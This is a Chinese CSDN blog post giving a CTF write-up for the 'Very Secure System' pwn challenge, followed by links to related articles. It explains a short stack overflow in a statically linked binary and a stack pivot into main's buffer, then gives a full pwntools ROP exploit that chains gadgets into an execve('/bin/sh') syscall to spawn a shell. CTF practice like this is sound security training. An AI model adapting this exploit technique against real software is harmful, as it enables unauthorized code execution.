pwn --rop

最新推荐文章于 2024-04-24 09:14:29 发布
最新推荐文章于 2024-04-24 09:14:29 发布
阅读量2k 收藏 2
点赞数
分类专栏: CTF 文章标签: pwn ctf rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29947311/article/details/69789316
版权

rop练习—Very Secure System

rop 真爽。。

题目链接:http://pan.baidu.com/s/1eSd0XTg
注:.bak是原题,原题有个过10s自动退出程序的设置,不好调试,我用ida打了个patch,就是另一个文件,两个文件只有这一个区别

漏洞分析:

这个程序是静态加载的,所以got表没有用,顺带dynelf也不行,也没提供libc。但是有一个函数可以溢出,但是只溢出了16字节,刚好可以覆盖rbp和ret的地址。
虽然有溢出点的函数没有充足的栈空间供我们构造rop链,但是由于子函数和main函数的栈是连接的,且main函数中有一个1024字节的占空间供我们使用,所以我们可以考虑用

add rsp,0x58
ret

这样的gadget来让esp指向mian函数中的那个1024字节的栈空间中,从而执行我们预先设置的rop链。所以我们需要在程序代码段中寻找一些gadget来进行rop攻击。

寻找gadget的两种方法(前提是装了rooper或者pwntools):

ropper -f vss | grep "gadget you need"

ROPgadget --binary vss | grep "gadget you need"

下面是利用代码:

    from pwn import *
    add_esp_0x58 = 0x046f205  # bigger than 0x50 to exec other gadget preset on stack
    pop_rdi = 0x0401823
    pop_rdx = 0x043ae05
    pop_rsi = 0x0401937
    pop_rax = 0x046f208
    pop_rcx = 0x0462873
    bss_w =0x0006C5C80
    syscall = 0x045f2a5
    mov_rdi_rcx = 0x42AB0B    #hard to find
    binsh = "/bin/sh\x00"
    payload = ""
    payload += "py"
    payload += "b" * (0x48 - 2)
    payload += p64(add_esp_0x58)
    payload += "a" * (0x58 - 0x50)
    payload += p64(pop_rax)
    payload += p64(59)
    payload += p64(pop_rdi)
    payload += p64(bss_w)
    payload += p64(pop_rcx)
    payload += binsh
    payload += p64(mov_rdi_rcx)
    payload += p64(pop_rsi)
    payload += p64(0)
    payload += p64(pop_rdx)
    payload += p64(0)
    payload += p64(syscall)

    io = process("./vss")
    print io.recv()
    io.send(payload)
    io.interactive()
Vccxx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN-Challenges
03-17
7. **ROP(Return-Oriented Programming)**:当栈不能执行时,学习如何通过利用已有的短指令序列(gadgets)构造有效payload,实现代码执行。 8. **Python在PWN中的应用**:使用Python编写exploit脚本,进行TCP...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
PWN入门(5)32位程序与64位程序和构造ROP
Ba1_Ma0的博客
09-12 1652
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
CTF-pwn pwntools用法探索
dzqxwzoe的博客
02-02 1423
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
PWN基础之构造ROP链(基本ROP
最新发布
Innocence_0的博客
04-24 321
如果需要更多则以此类推。网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…中断到来时,CPU暂停当前执行的代码,根据中断的中断号,在中断向量表中找到对应的中断处理程序,并调用它。
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1297
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
iOS冰与火之歌 – Objective-C Pwn and iOS arm64 ROP
Kiven's Program Space
08-17 1299
原文地址:http : //drops.wooyun.org/papers/12355 0x00序 冰指的是用户态,火指的是内核态。如何突破像冰箱一样的用户态沙盒最终到达并控制如火焰一般燃烧的内核就是“iOS的冰与火之歌”这一系列文章将要讲述的内容目录如下: Objective-C Pwn和iOS arm64 ROP██████████████████████████
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
useful-pwn-writeups:指向pwn挑战的有用文章的链接的回购
04-29
有用的pwn-writeups 指向pwn挑战的有用文章的链接的回购ROP 获取没有输出的标志 ret2dlresolve堆 双重免费+ FD重写 fastbin dup,舞台上的顶级Chunk Ptr覆盖面向文件流的编程橙屋Linux内核 copy_to_user copy_from_...
roprop2的题目的wp
一个码农的笔记
10-17 4465
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了roprop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
pwn学习资料整理——ROP技术
recover517的博客
08-30 4496
1. 在32位程序中,参数是以什么形式进行传递的? 2. 在64位程序中,参数是以什么形式进行传递的? 3. 什么是return address? 4. 怎么利用控制栈空间来达到执行程序命令? 5. 32位中构造ROP 6. 64位中构造ROP
Pwn-高阶ROP-[栈溢出]/篇3
m0_52343643的博客
05-11 1329
大概调用过程: 也就是我们这里先调用了write函数的plt表项触发了_dl_runtime_resolve函数(会push linkmap)之后会先到.rel.plt段,通过plt中给的push <偏移>在.rel.plt段中找到偏移处对应函数的重定位表项,再通过该表项的r_info(一个偏移量),找到.dynsym段中对应偏移量函数的符号表项,又通过该符号表项的st_name(也是一个偏移量)在.dynstr段找到对应的字符串,最后就会通过这个字符串(函数名)来调用该函数
Kernel pwn 基础教学之 Kernel ROP
蚁景网安学院
01-28 2506
点击"蓝字"关注,获取更多技术内容!前言Kernel ROP本质上还是构造ropchain来控制程序流程完成提权,不过相较于用户态来说还是有了一些变化,这里选取的例题是2018年强网杯的赛...
pwn学习-基本ROP
WocW的博客
03-03 1919
CTF-WIKI-pwn-基本ROP 漏洞复现 ret2text 首先检查程序的保护机制。 关于各个保护机制的介绍 :https://www.cnblogs.com/Spider-spiders/p/8798628.html 看到只开启了NX保护,即不可在栈上执行代码。 使用IDA查看源码,可以看到这里有一个危险的gets函数 以及这里有一个system函数 所以如...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4122
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
Pwntools_Study
RMC131的博客
04-17 323
pwntools中文文档 Pwntools | Lantern’s 小站 ,这篇文章也是参考了另一篇 pwntools使用 | 简书 ch3ckr 本文结合两篇,再加一点自己的见解 安装 ubuntu python3 pip3 sudo apt install libssl-dev sudo apt install libffi-dev pip install pwntools 简单使用 虽是简单使用,但对于还是菜鸟的我,还是十分受用的。 导入 from pwn import * 使用 from p
使用ROPgadget快速寻找arm64 pwnrop链之ret2csu
fjh1997的博客
01-28 1128
ROPgadget --binary ./pwn --only "ldp|ret" 看到最长的那个就是,我们得到rop链的入口0x400ff8接下来使用x30寄存器跳转的地址就是0x400ff8-0x20也就是0x400fd8这块.rop链第一阶段的目的是将0x400fd8填充到x30寄存器中。 也可以用rop ROPgadget --binary ./chall --only "ldr|mov|add|blr" 找到rop链链接的第二个片段入口 最后我们可以在x3中填充我们想要的地址,比如lib.
&p->payload
07-28
- *1* [CTF PWN - ROP ->Payload实例(攻防世界level2)](https://blog.csdn.net/yajuanpi4899/article/details/121153088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值